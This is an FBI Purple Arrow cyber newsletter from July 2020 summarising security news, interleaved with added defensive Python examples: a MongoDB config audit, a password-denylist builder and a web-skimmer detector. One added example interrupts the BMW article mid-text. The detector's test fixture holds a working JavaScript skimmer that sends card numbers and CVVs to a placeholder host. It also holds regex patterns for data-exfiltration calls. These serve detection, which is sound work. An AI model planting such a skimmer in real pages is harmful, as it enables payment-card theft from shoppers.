UNCLASSIFIED Page 1, 10 July 2020

Table of Contents
- U.S. finalizing federal contract ban for companies that use Huawei, others
- DOJ indicts 'fxmsp' hacker who reportedly breached hundreds of companies
- German intel warns against giving data to Chinese tech firms
- MongoDB is subject to continual attacks when exposed to the internet
- Casino App Clubillion Leaks PII on “Millions” of Users
- BMW customer database for sale on dark web
- One out of every 142 passwords is '123456'
- Connection discovered between Chinese hacker group APT15 and defense contractor
- Netgear not quite halfway there with patches for 28 out of 79 vulnerable router models
- DDoS Attacks Jump 542% from Q4 2019 to Q1 2020
- New ThiefQuest ransomware discovered targeting macOS users
- BBC Publishes Screenshots Allegedly Depicting Ransomware Negotiations Between NetWalker and UCSF
- 'Keeper' hacking group behind hacks at 570 online stores

U.S. finalizing federal contract ban for companies that use Huawei, others
Reuters, 9 Jul 2020: The Trump administration plans to finalize regulations this week that will bar the U.S. government from buying goods or services from any company that uses products from five Chinese companies including Huawei, Hikvision and Dahua, a U.S. official said. The rule, which was prompted by a 2019 law, could have far-ranging implications for companies that sell goods and services to the U.S. government since they will now need to certify they do not use products from Dahua or Hikvision, even though both are among the top sellers of surveillance equipment and cameras worldwide. The same goes for two-way radios from Hytera Communications Corp and telecommunications equipment or mobile devices like smartphones from Huawei Technologies or ZTE Corp. Any company that uses equipment or services in their day-to-day operations from these five companies will no longer be able to sell to the U.S. government without obtaining a U.S. government waiver.

The White House action comes amid increasing U.S.-China tension over the handling of the novel coronavirus, China’s actions in the former British colony of Hong Kong and a nearly two-year trade war. While it is unclear if this will have an impact on current contracts, it could complicate future contracts. Amazon.com Inc, for example, received 1,500 cameras to take temperatures of workers during the coronavirus pandemic from Zhejiang Dahua Technology Co Ltd in April. Amazon’s cloud unit is a major contractor with the U.S. intelligence community, and it has been battling Microsoft Corp for an up to $10 billion cloud computing deal with the Pentagon. The official said the administration will require agencies to conduct a national security analysis before they grant any waivers, something Congress did not expressly require in the statute. On June 30, the Federal Communications Commission formally designated Huawei and ZTE Corp as posing threats to U.S. national security, a declaration that bars U.S. firms from tapping an $8.3 billion government fund to purchase equipment from the companies.

Purpose
Educate recipients of cyber events to aid in protecting electronically stored DoD, corporate proprietary, and/or Personally Identifiable Information from unauthorized access, theft or espionage.

Source
This publication incorporates open source news articles to educate readers on cyber security matters IAW USC Title 17, section 107, Para a. All articles are truncated to avoid the appearance of copyright infringement.

Newsletter Team
- SA Sylvia Romero, Albuquerque FBI
- CI Agent Scott Daughtry, Purple Arrow Founder

Subscription/Questions
Click HERE to request that your employer-provided email address be added to this product’s distribution list.

Purple Arrow Overview
The Purple Arrow Working Group was founded in 2009 to address suspicious reporting originating from New Mexico (NM) cleared companies. Purple Arrow is a subset of the NM CI Working Group.

Purple Arrow Members
Our membership includes representatives from these New Mexico-focused agencies: 902nd MI, AFOSI, DOE, DCSA, DTRA, FBI, HSI and NCIS.

Disclaimer
Viewpoints, company names, or products within this document are not necessarily the opinion of, or an endorsement by, the FBI or any member of the Purple Arrow Working Group or NM CI Working Group.

Distribution
You may freely forward this product to U.S. person co-workers or other U.S. agency / U.S. company managed email accounts.

Personal Email/Foreigners
The FBI will not send Purple Arrow products to a non-United States employer-provided email account (e.g. Hotmail, Gmail).

DOJ indicts 'fxmsp' hacker who reportedly breached hundreds of companies
Engadget, 7 Jul 2020: An American court has unsealed the criminal charges [ link ] against a prolific hacker known as fxmsp, finally revealing the identity of the “invisible god of networks.” In an announcement posted by the Western District of Washington’s US Attorney’s Office, authorities have identified fxmsp as a 37-year-old Kazakhstan citizen named Andrey Turchin. The five felony charges against Turchin date back to December 2018, but they remained sealed until this revelation, which follows a report published by security vendor Group-IB about the extent of fxmsp’s illicit activities [ link ]. According to authorities, Turchin and his accomplices targeted hundreds of corporate networks in more than 40 countries between October 2017 and December 2018. Group-IB’s report says fxmsp and his group sold network access to hotel chains, banks and other financial firms, making at least $1.5 million from their operation. As a result of their activities, their victims reportedly lost tens of millions of dollars to malware and network damage. They’ve been inactive since last year after fxmsp made headlines for advertising access to data from popular cybersecurity firms McAfee, Trend Micro and Symantec. However, at least one cybersecurity firm believes they’re still operating under different names.

German intel warns against giving data to Chinese tech firms
Associated Press, 9 Jul 2020: Germany's domestic intelligence agency is warning consumers that personal data they provide to Chinese payment companies or other tech firms could end up in the hands of China's government.
In its annual report released Thursday, the BfV agency noted that Chinese government offices have access to data stored in China by companies such as Tencent, Alibaba “as well as other apps, web services and mobility providers such as for example (bike sharing) providers” that operate in Germany. The head of the BfV, Thomas Haldenwang, said Germans' data isn't safe with Chinese companies because they are required by law to provide the data to their government. “Any customer here in Germany who uses such a system shouldn't be surprised if this data is abused in Beijing,” he told reporters. “We can only warn against this.” Seehofer added that Germany has yet to reach a “political decision” on whether to let Chinese telecom equipment company Huawei supply infrastructure to German cellphone service providers.

Incident Reporting
- Cleared Company: notify your Defense Counterintelligence and Security Service representative. If the event compromised DoD information, you must also initiate the DIBNET process.
- Financial Scam/Fraud: submit a complaint to the FBI’s Internet Crime Complaint Center (IC3).
- Children: if a child has been targeted via the Internet, contact your state’s Attorney General via their web site. They likely have an Internet Crimes against Children task force that specializes in this crime category.

Cyber investigations are likely to require the original offending email (to obtain the email headers) and/or log files that are generated/maintained by an IDS, router or firewall. Ensure your IT office preserves this information should law enforcement request them for analysis.

Newsletter Archival
We do not maintain a formal archive of this newsletter. Your company/agency may archive Purple Arrow products on its internal network. This product may NOT be altered in any way.

Cybersecurity Training
All employees must understand cyber threats and think defensively every time they use automated systems. Many intrusions occur because a single employee failed basic cybersecurity practices and clicked on a hostile hyperlink or opened a malicious file attachment. The Defense Counterintelligence and Security Agency (formerly known as DSS) offers free cyber training via its Center for Development of Security Excellence (CDSE) website. Click HERE for info.
MongoDB is subject to continual attacks when exposed to the internet
Helpnet Security, 8 Jul 2020: On average, an exposed Mongo database is breached within 13 hours of being connected to the internet. The fastest breach recorded was carried out 9 minutes after the database was set up, according to Intruder. MongoDB is a general purpose, document-based, distributed database that consistently ranks in the top 5 most-used databases worldwide. It is used by a wide range of organizations all over the globe to store and secure sensitive application and customer data. There are 80,000 exposed MongoDB services on the internet, of which 20,000 were unsecured. Of those unsecured databases, 15,000 are already infected with ransomware.

The research shows that MongoDB is subject to continual attacks when exposed to the internet. Attacks are carried out automatically and indiscriminately and on average an unsecured database is compromised less than 24 hours after going online. At least one of the honeypots was held to ransom within a minute of connecting. The attacker erased the database’s tables and replaced them with a ransom note, requesting payment in Bitcoin for recovery of the data. Attacks originated from locations all over the globe, though attackers routinely hide their true location, so there’s often no way to tell where attacks are really coming from. The fastest breach came from an attacker from Russian ISP Skynet and over half of the breaches originated from IP addresses owned by a Romanian VPS provider. “Even if security teams can detect an unsecured database and recognise its potential severity, responding to and containing such a misconfiguration in less than 13 hours may be a tall order, let alone in under 9 minutes. Prevention is a much stronger defence than cure.”

Casino App Clubillion Leaks PII on “Millions” of Users
Infosecurity Magazine, 8 Jul 2020: An unsecured Elasticsearch database has been leaking data on millions of global gambling app users, according to researchers at vpnMentor. The group discovered the unsecured database hosted on AWS as part of a broader web mapping project. It was quickly traced back to casino app Clubillion, which was contacted on March 23. The database was finally secured on April 5, five days after AWS was also contacted. Unlike many similar discoveries, this online database was updated with huge amounts of users’ personal information every single day: in the region of 200 million new records, or 50GB, daily, and sometimes considerably more, according to vpnMentor. These records included every action taken by every player on the app (“win,” “lose,” “update account,” etc.) and personally identifiable information (PII) including emails, private messages, winnings and IP addresses. The research team warned that gambling apps are a popular target for cyber-criminals, who go looking for PII and to target software vulnerabilities in order to install malware on users’ devices. “On a single day, tens of thousands of individual Clubillion players were exposed. Each one of these players could be targeted by malicious hackers for fraud and cyber-attacks – along with millions more whose records were also contained in the database,” it claimed.

BMW customer database for sale on dark web
SC Magazine, 2 Jul 2020: A database of 384,319 BMW car owners in the U.K. is being offered for sale on an underground forum by the KelvinSecurity Team hacking group, according to KELA, a darknet threat intelligence firm, based in Tel Aviv. According to KELA, the threat actor claimed that the BMW data came from a “call center” that manages customers of different car suppliers.
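On the MongoDB item above: the two settings that turn a freshly installed mongod into the kind of exposed, unauthenticated database Intruder's honeypots modelled are the listen address and the authorization switch. What follows is an added example, not code from the article or from Intruder. It parses a mongod.conf and reports those weak settings, run against a constructed weak configuration and a constructed hardened one; the config texts, the paths in them and the set of checks are this example's own assumptions.

```python
"""Audit a mongod.conf for the settings behind an internet-exposed, unauthenticated MongoDB.

Added example (not the article's or Intruder's code). The two config texts below are
constructed; the paths in them are placeholders.
"""
from __future__ import annotations

# Constructed: listens on every interface with authorization left off.
WEAK_CONF = """\
storage:
  dbPath: /var/lib/mongodb
net:
  port: 27017
  bindIp: 0.0.0.0        # reachable from any host that can route to it
security:
  authorization: disabled
"""

# Constructed: loopback only, role-based authorization on, TLS required.
HARDENED_CONF = """\
storage:
  dbPath: /var/lib/mongodb
net:
  port: 27017
  bindIp: 127.0.0.1      # app servers reach it over a private interface or a tunnel
  tls:
    mode: requireTLS
security:
  authorization: enabled
"""


def parse_conf(text: str) -> dict[str, str]:
    """Parse the indented key/value subset mongod.conf uses into dotted keys.

    Returns e.g. {"net.bindIp": "0.0.0.0"}. Comments are stripped. This is a
    deliberately small parser for the example, not a YAML implementation.
    """
    result: dict[str, str] = {}
    path: list[tuple[int, str]] = []  # (indent, key) of the enclosing sections
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].rstrip()
        if not line.strip():
            continue
        indent = len(line) - len(line.lstrip(" "))
        key, _, value = line.strip().partition(":")
        while path and path[-1][0] >= indent:
            path.pop()
        dotted = ".".join([k for _, k in path] + [key.strip()])
        if value.strip():
            result[dotted] = value.strip()
        else:
            path.append((indent, key.strip()))
    return result


def audit(conf: dict[str, str]) -> list[str]:
    """Return the findings that matter for the exposure described in the article.

    Defaults follow mongod's documented behaviour: bindIp defaults to localhost
    and authorization to disabled when the keys are absent.
    """
    findings: list[str] = []
    bind = conf.get("net.bindIp", "127.0.0.1")
    listens_everywhere = conf.get("net.bindIpAll") == "true" or any(
        a.strip() in ("0.0.0.0", "::", "*") for a in bind.split(",")
    )
    if listens_everywhere:
        findings.append(f"net.bindIp={bind}: mongod accepts connections on every interface")
    if conf.get("security.authorization", "disabled") != "enabled":
        findings.append("security.authorization is not 'enabled': any client can read and drop collections")
    if listens_everywhere and conf.get("net.tls.mode") != "requireTLS":
        findings.append("net.tls.mode is not requireTLS on a non-loopback listener")
    return findings


if __name__ == "__main__":
    for name, text in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        print(name, audit(parse_conf(text)) or ["no findings"])
```

The audit treats an absent `net.bindIp` as localhost and an absent `security.authorization` as disabled, which is mongod's own default in both cases, so a config that never mentions authorization is reported just like one that sets it to disabled.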
KELA said it obtained the database and found that it contains almost 500,000 customer records from 2016 to 2018, also affecting U.K. owners of other car manufacturers, including Mercedes, SEAT, Honda and Hyundai, among others. KELA told SC Media KelvinSecurityTeam has been highly active on underground forums, offering in June 2020 alone for sale 16 databases, including data related to U.S government contractors and Russian military weapons development. In addition, the group reportedly dumped for free 28 databases affecting entities in Mexico, Iran, U.S., Australia, Sweden, France and Indonesia.

One out of every 142 passwords is '123456'
ZD Net, 1 Jul 2020: In one of the biggest password re-use studies of its kind, an analysis of more than one billion leaked credentials has discovered that one out of every 142 passwords is the classic "123456" string. The study, carried out last month by computer engineering student Ata Hakçıl, analyzed username and password combinations that leaked online after data breaches at various companies. The data dumps are easily available online, on sites like GitHub or GitLab, or freely distributed via hacking forums and file-sharing portals. Over the years, tech companies have been collecting these data dumps. For example, Google, Microsoft, and Apple have collected leaked credentials to create in-house alert systems that warn users when they're utilizing a "weak" or "common" password. Last month, Hakçıl, a Turkish student studying at a university in Cyprus, downloaded and analyzed more than one billion leaked credentials. The main discovery was that the 1,000,000,000+ credentials dataset included only 168,919,919 unique passwords, of which more than 7 million were the "123456" string. This means that one out of every 142 passwords included in the sample Hakçıl analyzed was the weakest password known today -- with the "123456" string being the most commonly reused password online for the past five years in a row, and counting. The study's full results are available on GitHub [ link ], with a short summary below:
- From 1.000.000.000+ lines of dumps, 257.669.588 were filtered as either corrupt data (gibberish in improper format) or test accounts.
- 1 Billion credentials boil down to 168.919.919 passwords, and 393.386.953 usernames.
- Most common password is 123456. It covers roughly 0.722% of all the passwords. (Around 7 million times per billion)
- Most common 1000 passwords cover 6.607% of all the passwords.
- With most common 1 million passwords, hit-rate is at 36.28%, and with most common 10 million passwords hit rate is at 54.00%.
- Average password length is 9.4822 characters.
- 12.04% of passwords contain special characters.
- 28.79% of passwords are letters only.
- 26.16% of passwords are lowercase only.
- 13.37% of passwords are numbers only.
- 34.41% of all passwords end with digits, but only 4.522% of all passwords start with digits.

Connection discovered between Chinese hacker group APT15 and defense contractor
ZD Net, 2 Jul 2020: Lookout said it linked APT15 malware to Xi'an Tianhe Defense Technology, a Chinese defense contractor. In a report published today [ link ], cyber-security firm Lookout said it found evidence connecting Android malware that was used to spy on minorities in China to a large government defense contractor from the city of Xi'an. Some of the group's past hacking operations have been documented by other cyber-security firms, and the hacking group is already known in industry circles under different codenames, such as APT15, GREF, Ke3chang, Mirage, Vixen Panda, and Playful Dragon. The vast majority of past APT15 attacks involved malware designed to infect Windows desktops, but Lookout said the group also developed an arsenal of Android hacking tools. Hacking tools that were already known include malware strains identified as HenBox, PluginPhantom, Spywaller, and DarthPusher. On top of these, Lookout said it also discovered four new ones, which they codenamed SilkBean, DoubleAgent, CarbonSteal, and GoldenEagle.

The fact that Lookout linked an APT15 malware sample to a Chinese defense contractor is not a novel discovery. From 2017 to 2019, four other Chinese state-sponsored hacking groups have been linked to contractors hired by Chinese intelligence agencies operating in various regional offices. This includes:
- APT3 - linked to a company named Boyusec operating on behalf of Chinese state security officials in the province of Guangdong
- APT10 - linked to several companies operating on behalf of Chinese state security officials in the province of Tianjin
- APT17 - linked to several companies operating on behalf of Chinese state security officials in the province of Jinan
- APT40 - linked to several shell companies operating on behalf of Chinese state security officials in the province of Hainan

Operators behind APT3 and APT10 were eventually charged by the US Department of Justice in November 2017 and December 2018, respectively. Based on previous threat intelligence reports published by cyber-security firms Recorded Future and CrowdStrike, the Chinese Ministry of State Security outsources hacking operations to outside contractors, who report directly to and take orders from intelligence officials.
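To show how the figures in the password re-use study above are produced, and what a defender does with them, here is an added example that is not Hakçıl's code (his results are on GitHub). It parses a constructed credential dump in the usual "username:password" line format, drops corrupt lines the way the study filtered its input, recomputes the same kinds of metrics (unique passwords and usernames, top-k coverage, composition percentages) and then turns the most common entries into the denylist check that the article says Google, Microsoft and Apple run at sign-up. The dump, the names in it and the toy `top_k` value are this example's assumptions; the study used the top 1,000, 1 million and 10 million.

```python
"""Recompute password-reuse statistics over a credential dump and build a denylist.

Added example; not Ata Hakçıl's code. The dump below is constructed, and the
top_k used for the denylist is a toy value.
"""
from collections import Counter
import string

# Constructed dump in the usual "username:password" line format, with two bad lines.
DUMP_LINES = """\
alice@example.com:123456
bob@example.com:123456
carol@example.com:Summer2019!
dave@example.com:123456
erin@example.com:password
frank@example.com:letmein
grace@example.com:qwerty
heidi@example.com:123456
ivan@example.com:7h3Qu1ckBr0wnF0x
judy@example.com:123456
this line has no separator and is dropped as corrupt
mallory@example.com:password
oscar@example.com:987654321
peggy@example.com:Tr0ub4dor&3
trent@example.com:
""".splitlines()


def parse_dump(lines):
    """Return ([(username, password), ...], dropped_count).

    A line is dropped when it has no separator or an empty user or password,
    the same kind of filtering the study applied before counting.
    """
    creds, dropped = [], 0
    for line in lines:
        user, sep, pw = line.partition(":")
        if not (sep and user and pw):
            dropped += 1
            continue
        creds.append((user, pw))
    return creds, dropped


def password_stats(creds):
    """Compute the kinds of figures the study summary lists, as fractions of all passwords."""
    pws = [pw for _, pw in creds]
    n = len(pws)
    counts = Counter(pws)
    ranked = [pw for pw, _ in counts.most_common()]

    def coverage(k):
        # share of all passwords matched by the k most common distinct ones
        return sum(counts[pw] for pw in ranked[:k]) / n

    return {
        "total": n,
        "unique_passwords": len(counts),
        "unique_usernames": len({u for u, _ in creds}),
        "most_common": ranked[0],
        "top1_coverage": coverage(1),
        "top3_coverage": coverage(3),
        "avg_length": sum(map(len, pws)) / n,
        "special_chars": sum(any(c in string.punctuation for c in pw) for pw in pws) / n,
        "letters_only": sum(pw.isalpha() for pw in pws) / n,
        "lowercase_only": sum(pw.isalpha() and pw.islower() for pw in pws) / n,
        "digits_only": sum(pw.isdigit() for pw in pws) / n,
        "ends_with_digit": sum(pw[-1].isdigit() for pw in pws) / n,
        "starts_with_digit": sum(pw[0].isdigit() for pw in pws) / n,
    }


def build_denylist(creds, top_k):
    """The top_k most common passwords, lower-cased, as a registration-time denylist."""
    counts = Counter(pw for _, pw in creds)
    return {pw.lower() for pw, _ in counts.most_common(top_k)}


def is_denied(candidate, denylist):
    """Case-insensitive check a sign-up form would run before accepting a new password."""
    return candidate.lower() in denylist


if __name__ == "__main__":
    creds, dropped = parse_dump(DUMP_LINES)
    print(f"{dropped} lines dropped, {len(creds)} credentials kept")
    for key, value in password_stats(creds).items():
        print(f"{key:>18}: {value:.4f}" if isinstance(value, float) else f"{key:>18}: {value}")
    denylist = build_denylist(creds, top_k=2)
    print("123456 denied:", is_denied("123456", denylist))
```

The coverage figure is the one worth watching: it is the fraction of accounts an attacker covers by trying only the top-k list, which is exactly what a denylist at sign-up removes. Matching is case-insensitive so that "Password" does not slip past a list that contains "password".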
Netgear not quite halfway there with patches for 28 out of 79 vulnerable router models
TheRegister, 30 Jun 2020: Netgear has now patched 28 out of 79 vulnerable router models, six months after infosec researchers first noticed security problems potentially allowing an attacker to remotely execute code as root. The latest hotfixes come after two models were fixed earlier in June. The vulnerability in question could, for example, allow the opening of a superuser-level telnet backdoor, as we reported at the time. Over the past few weeks Netgear has been pushing out fixes, having so far plugged problems with 28 of the 79 models it says are affected by the unwanted remote-superuser flaw. The vulnerabilities, initially discovered by Trend Micro's Zero Day Initiative (ZDI) in January, were meant to have been patched by 15 June. Netgear asked for an extension at the end of May for a further month, prompting the ZDI to publish an advisory note. "The Cybersecurity and Infrastructure Security Agency (CISA) encourages users and administrators to update to the most recent firmware version and to replace end-of-life devices that are no longer supported with security patches," said the US computer security agency in a note issued last night.
DDoS Attacks Jump 542% from Q4 2019 to Q1 2020
DarkReading, 30 Jun 2020: In the first quarter of 2020, distributed denial-of-service (DDoS) attacks jumped more than 542% compared with the last quarter of 2019 and more than 278% year-over-year. NexusGuard researchers suggest the spike may be linked to a parallel increase in malicious cyber activity during the COVID-19 pandemic [ link ]. Cybercriminals have responded to the work-from-home shift with a series of long DDoS attacks aimed at hosting providers and businesses. The Akamai team recently mitigated the largest packet-per-second DDoS attack recorded on the company's platform — double the volume of its previous record. Researchers see attackers shifting toward attacks with lower bits-per-second and higher packets-per-second, likely seeking weak spots in DDoS mitigation techniques. In addition to traditional DDoS attacks, NexusGuard researchers detected abnormal traffic patterns from ISPs such as traffic generated from infected devices, and traffic generated by exploiting open resolvers (DNS, DLAP, etc.) to create small, short attacks they call "invisible killers." ISPs often overlook these threats, the researchers explain in a new DDoS threat report.

New ThiefQuest ransomware discovered targeting macOS users
ZD Net, 30 Jun 2020: Named OSX.ThiefQuest (or EvilQuest), this ransomware is different from previous macOS ransomware threats because besides encrypting the victim's files, ThiefQuest also installs a keylogger, a reverse shell, and steals cryptocurrency wallet-related files from infected hosts. "Armed with these capabilities, the attacker can maintain full control over an infected host," said Patrick Wardle, Principal Security Researcher at Jamf. This means that even if victims paid, the attacker would still have access to their computer and continue to steal files and keyboard strokes.

Reed and Stokes are currently looking for a weakness or bug in the ransomware's encryption scheme that could be exploited to create a decryptor and help infected victims recover their files without paying the ransom. But the researcher who first spotted the new ThiefQuest ransomware is K7 Lab security researcher Dinesh Devadoss. Devadoss tweeted about his finding yesterday, June 29. However, new evidence that surfaced in the meantime has revealed that EvilQuest has, in reality, been distributed in the wild since the start of June 2020. Reed told ZDNet in a phone call today that Malwarebytes found ThiefQuest hidden inside pirated macOS software uploaded on torrent portals and online forums, such as a pirated version of music production app Ableton, DJ mixing software Mixed In Key, and security tool Little Snitch. However, Reed told us he believes the ransomware is most likely more broadly distributed, leveraging many other apps, and not just these three. Stokes told ZDNet the ransomware will encrypt any files with the following file extensions: .pdf, .doc, .jpg, .txt, .pages, .pem, .cer, .crt, .php, .py, .h, .m, .hpp, .cpp, .cs, .pl, .p, .p3, .html, .webarchive, .zip, .xsl, .xslx, .docx, .ppt, .pptx, .keynote, .js, .sqlite3, .wallet, .dat. After the encryption process ends, the ransomware installs a keylogger to record all the user's keystrokes, a reverse shell so the attacker can connect to the infected host and run custom commands, and will also look to steal certain files. In his own analysis of ThiefQuest, Reed also noted that the ransomware attempts to modify files specific to Google Chrome's update mechanism, and use the files as a form of persistence on infected hosts.

All victims infected by this point should consider their data lost forever, unless researchers find a way to break the encryption and recover their files. ThiefQuest is the third ransomware strain that has exclusively targeted macOS users after KeRanger and Patcher. Another macOS ransomware strain called Mabouia only existed at a theoretical level and was never released in the real world.
BBC Publishes Screenshots Allegedly Depicting Ransomware Negotiations Between NetWalker and UCSF
Security Boulevard, 1 Jul 2020: The BBC claims to have obtained proof of ransom negotiations between the NetWalker gang and the University of California San Francisco almost a week after the college publicly reported on the costly security incident. Readers might recall that NetWalker ransomware operators recently persuaded the UCSF to pay over $1 million in an extortion scheme using data-encrypting malware. Now, BBC News reports that an anonymous tip-off allegedly enabled the outlet to follow the ransom negotiations in a live chat on the dark web. According to the screen captures, NetWalker operators initially demanded a $3 million ransom, reasoning the amount is pennies for an education institution with billions in annual turnover. But the university, likely with the help of an external specialist negotiator, explained the pandemic had been “financially devastating” for the college and asked them to accept $780,000. After some back and forth, the hackers eventually accepted 116.4 bitcoins, or roughly $1.14 million.

'Keeper' hacking group behind hacks at 570 online stores
ZD Net, 7 Jul 2020: A hacking group known as "Keeper" is responsible for security breaches at more than 570 online e-commerce portals over the last three years. The Keeper gang broke into online store backends, altered their source code, and inserted malicious scripts that logged payment card details entered by shoppers in checkout forms. These types of attacks are what the cyber-security community calls web skimming, e-skimming, or "Magecart" intrusions (named so after the first hacker group that used these tactics). In a report published today by threat intelligence firm Gemini Advisory, the company says that Keeper has been operating since at least April 2017, and continues to operate even today.

By fingerprinting this backend panel, Gemini was able to track all of Keeper's historical activities. This included the locations of past backend panels, malicious URLs used to host hacking infrastructure, but also a list of hacked online stores where Keeper inserted its malicious scripts. Gemini said that almost 85% of the 570 hacked stores ran on top of the Magento e-commerce platform. Most of the stores were small to medium-sized operations. Based on Amazon's Alexa traffic rankings, Gemini says the vast majority of stores were small-scale operations but that Keeper also hit some big names -- sites that drew between 500,000 and 1,000,000 monthly visitors. "Based on the provided number of collected cards during a nine-month window, and accounting for the group's operations since April 2017, Gemini estimates that it has likely collected close to 700,000 compromised cards," Gemini experts said in a report shared today with ZDNet [ link ]. "Given the current dark web median price of $10 per compromised Card Not Present (CNP) card, this group has likely generated upwards of $7 million USD from stealing and selling compromised payment cards in its full lifespan." The Gemini Advisory report contains the full list of all the 570+ sites that the Keeper gang hacked since April 2017 [ link ]. The Keeper group is tracked by other cyber-security companies as Magecart Group #8, CoffeeMokko, and JS-Sniffers 4.
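Gemini tracked Keeper from the gang's backend panel; a store owner only ever sees the injected script in their own checkout page. The following is an added example, not Gemini Advisory's tooling or anything from the article, showing a static check a defender can run over a saved copy of a checkout page: it flags script tags loaded from hosts outside the site's own allowlist, and inline scripts that both read card fields and contain a way to send data off the page. The HTML, the allowlist hosts and the host name skimmer.example.invalid are constructed placeholders.

```python
"""Static check of a saved checkout page for web-skimming indicators.

Added example; not Gemini Advisory's method. The HTML, the allowlist and the host
skimmer.example.invalid are constructed placeholders.
"""
from html.parser import HTMLParser
import re
from urllib.parse import urlparse

# Assumption: hosts the shop legitimately loads scripts from.
ALLOWED_SCRIPT_HOSTS = {"shop.example.com", "cdn.example.com"}

# Inline-script heuristics: reads payment fields AND has a way to send data out.
CARD_FIELD_RE = re.compile(r"card[_-]?number|cvv|cvc|expir", re.I)
EXFIL_RE = re.compile(r"XMLHttpRequest|fetch\(|sendBeacon|new Image\(|\.src\s*=", re.I)


class ScriptCollector(HTMLParser):
    """Collects external script URLs and inline script bodies from a page."""

    def __init__(self):
        super().__init__()
        self.external, self.inline = [], []
        self._in_script, self._buf = False, []

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "script":
            return
        src = dict(attrs).get("src")
        if src:
            self.external.append(src)
        else:
            self._in_script, self._buf = True, []

    def handle_data(self, data):
        # HTMLParser hands script bodies to handle_data, possibly in chunks.
        if self._in_script:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag.lower() == "script" and self._in_script:
            self.inline.append("".join(self._buf))
            self._in_script = False


def find_skimmer_indicators(html, allowed_hosts=ALLOWED_SCRIPT_HOSTS):
    """Return human-readable findings; an empty list means nothing suspicious was found."""
    collector = ScriptCollector()
    collector.feed(html)
    findings = []
    for src in collector.external:
        host = urlparse(src).hostname  # None for same-origin relative paths
        if host and host not in allowed_hosts:
            findings.append(f"script loaded from unexpected host: {host}")
    for body in collector.inline:
        if CARD_FIELD_RE.search(body) and EXFIL_RE.search(body):
            findings.append("inline script reads card fields and sends data out")
    return findings


# Constructed checkout page as the shop deployed it.
CLEAN_PAGE = """<html><body>
<form id="checkout"><input name="card_number"><input name="cvv"></form>
<script src="/js/checkout.js"></script>
<script src="https://cdn.example.com/analytics.js"></script>
</body></html>"""

# The same page with a constructed injection of the kind the article describes.
INJECTED_PAGE = CLEAN_PAGE.replace("</body>", """<script src="https://skimmer.example.invalid/lib.js"></script>
<script>
document.getElementById('checkout').addEventListener('submit', function () {
  var payload = document.querySelector('[name=card_number]').value + '|' +
                document.querySelector('[name=cvv]').value;
  new Image().src = 'https://skimmer.example.invalid/c?d=' + btoa(payload);
});
</script>
</body>""")


if __name__ == "__main__":
    print("clean page:", find_skimmer_indicators(CLEAN_PAGE) or ["no findings"])
    print("injected page:", find_skimmer_indicators(INJECTED_PAGE))
```

Running the check against a known-good copy of the page first establishes the allowlist; after that, any new host or any inline script that touches card fields is a change worth a human look. The inline heuristic needs both a field reference and a send primitive, so an ordinary form-validation script does not trip it.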